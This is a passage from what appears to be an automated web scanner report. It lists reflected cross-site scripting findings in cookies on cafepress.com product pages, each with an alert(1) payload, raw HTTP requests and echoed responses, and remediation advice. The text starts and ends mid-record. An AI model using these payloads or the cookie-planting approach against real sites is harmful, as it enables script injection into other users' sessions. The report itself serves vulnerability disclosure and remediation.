__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 52650 Date: Sun, 26 Dec 2010 13:48:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 52650 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '75fbc</script><script>alert(1)</script>3209aface0d ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08...[SNIP]...
1.116. http://www.cafepress.com/make/custom-t-shirts [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /make/custom-t-shirts
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8dde"-alert(1)-"0740f775c1c was submitted in the cp-v cookie, appended to the existing cookie value. This input was echoed unmodified in the application's response: in the response below it appears inside the double-quoted s.eVar30 analytics assignment, where the embedded double quote terminates the string literal and the remainder is parsed as JavaScript. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability, which considerably mitigates the impact. Note, however, that the application's own cookies are scoped to domain=cafepress.com and the page is served over plain HTTP, so a cookie planted from any other host within that domain, or injected by an attacker on the network path, would satisfy that precondition; the Information rating should be revisited if either is in scope.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; a safer pattern is to pass the value through an HTML attribute (for example a data- attribute) with ordinary HTML entity encoding and read it from script. Where the value must be written into a string literal inside a script element, every non-alphanumeric character should be emitted as a \uXXXX (or \xHH) escape, covering both quote characters, the backslash, the angle brackets and slash that form the </script> sequence, and the U+2028 and U+2029 line terminators. Escaping quotes alone is not sufficient: the HTML parser terminates the script element at the first </script> it encounters, regardless of how the surrounding JavaScript is quoted.
Request
GET /make/custom-t-shirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 112228 Date: Sun, 26 Dec 2010 13:48:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 112228 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd8dde"-alert(1)-"0740f775c1c "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.117. http://www.cafepress.com/make/custom-t-shirts [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-t-shirts
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ba57</script><script>alert(1)</script>0e63e38f264 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-t-shirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=8ba57</script><script>alert(1)</script>0e63e38f264 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 112251 Date: Sun, 26 Dec 2010 13:48:03 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 112251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = '8ba57</script><script>alert(1)</script>0e63e38f264 ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.118. http://www.cafepress.com/make/custom-thermos [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-thermos
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eea1"-alert(1)-"d0c14b83f86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55394 Date: Sun, 26 Dec 2010 13:48:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55394 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8eea1"-alert(1)-"d0c14b83f86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.119. http://www.cafepress.com/make/custom-thermos [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-thermos
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc081</script><script>alert(1)</script>a5d7c25c9aa was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cc081</script><script>alert(1)</script>a5d7c25c9aa ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 55416 Date: Sun, 26 Dec 2010 13:48:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 55416 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... omain_us = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'Make' window.cafepress.tealeaf.searchTerm = 'cc081</script><script>alert(1)</script>a5d7c25c9aa ' window.cafepress.tealeaf.salesChannel = 'Make' window.cafepress.tealeaf.trafficMedium = 'Direct' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP...[SNIP]...
1.120. http://www.cafepress.com/make/custom-water-bottles [cp-v cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-water-bottles
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67f7b"-alert(1)-"cf8efdc4007 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /make/custom-water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58828 Date: Sun, 26 Dec 2010 13:48:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58828 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA67f7b"-alert(1)-"cf8efdc4007 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.121. http://www.cafepress.com/make/custom-water-bottles [cp_st cookie]
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/make/custom-water-bottles
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bca4a</script><script>alert(1)</script>d8d616836de was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
